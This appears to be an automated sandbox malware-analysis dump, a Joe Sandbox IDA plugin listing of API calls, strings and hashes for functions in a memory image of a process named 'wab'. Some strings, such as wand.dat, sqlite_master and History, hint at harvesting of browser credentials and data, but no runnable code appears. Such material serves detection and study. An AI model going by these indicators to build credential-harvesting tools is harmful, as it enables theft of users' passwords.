                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                            APIs
                                            • wcscpy.MSVCRT ref: 0044475F
                                            • wcscat.MSVCRT ref: 0044476E
                                            • wcscat.MSVCRT ref: 0044477F
                                            • wcscat.MSVCRT ref: 0044478E
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                            • String ID: \StringFileInfo\
                                            • API String ID: 102104167-2245444037
                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$??3@
                                            • String ID: g4@
                                            • API String ID: 3314356048-2133833424
                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _memicmpwcslen
                                            • String ID: @@@@$History
                                            • API String ID: 1872909662-685208920
                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                            APIs
                                            • memset.MSVCRT ref: 004100FB
                                            • memset.MSVCRT ref: 00410112
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 00410141
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                            • String ID: </%s>
                                            • API String ID: 3400436232-259020660
                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                            APIs
                                            • memset.MSVCRT ref: 0040D58D
                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ChildEnumTextWindowWindowsmemset
                                            • String ID: caption
                                            • API String ID: 1523050162-4135340389
                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                            APIs
                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                            • String ID: MS Sans Serif
                                            • API String ID: 210187428-168460110
                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ClassName_wcsicmpmemset
                                            • String ID: edit
                                            • API String ID: 2747424523-2167791130
                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                            • String ID: SHAutoComplete$shlwapi.dll
                                            • API String ID: 3150196962-1506664499
                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memcmp
                                            • String ID:
                                            • API String ID: 3384217055-0
                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                            APIs
                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                            • GetMenu.USER32(?), ref: 00410F8D
                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                            • String ID:
                                            • API String ID: 1889144086-0
                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                            APIs
                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                            • GetLastError.KERNEL32 ref: 0041810A
                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                            • String ID:
                                            • API String ID: 1661045500-0
                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                            APIs
                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                            • memcpy.MSVCRT ref: 0042EC7A
                                            Strings
                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                            • API String ID: 1297977491-2063813899
                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                            APIs
                                            • memset.MSVCRT ref: 0040560C
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.*$dat$wand.dat
                                            • API String ID: 2618321458-1828844352
                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                            APIs
                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                            • wcslen.MSVCRT ref: 00410C74
                                            • _wtoi.MSVCRT ref: 00410C80
                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                            • String ID:
                                            • API String ID: 1549203181-0
                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                            APIs
                                            • memset.MSVCRT ref: 00412057
                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                            • String ID:
                                            • API String ID: 3550944819-0
                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                            APIs
                                            • wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • memcpy.MSVCRT ref: 0040A94F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 3023356884-0
                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                            APIs
                                            • wcslen.MSVCRT ref: 0040B1DE
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                            • memcpy.MSVCRT ref: 0040B248
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 3023356884-0
                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            • String ID:
                                            • API String ID: 1865533344-0
                                            • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                            • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                            APIs
                                            • strlen.MSVCRT ref: 0040B0D8
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                            • memcpy.MSVCRT ref: 0040B159
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@$memcpy$mallocstrlen
                                            • String ID:
                                            • API String ID: 1171893557-0
                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                            APIs
                                            • memset.MSVCRT ref: 004144E7
                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                              • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                            • memset.MSVCRT ref: 0041451A
                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                            • String ID:
                                            • API String ID: 1127616056-0
                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: sqlite_master
                                            • API String ID: 438689982-3163232059
                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                            APIs
                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                            • wcscpy.MSVCRT ref: 00414DF3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                            • String ID:
                                            • API String ID: 3917621476-0
                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                            APIs
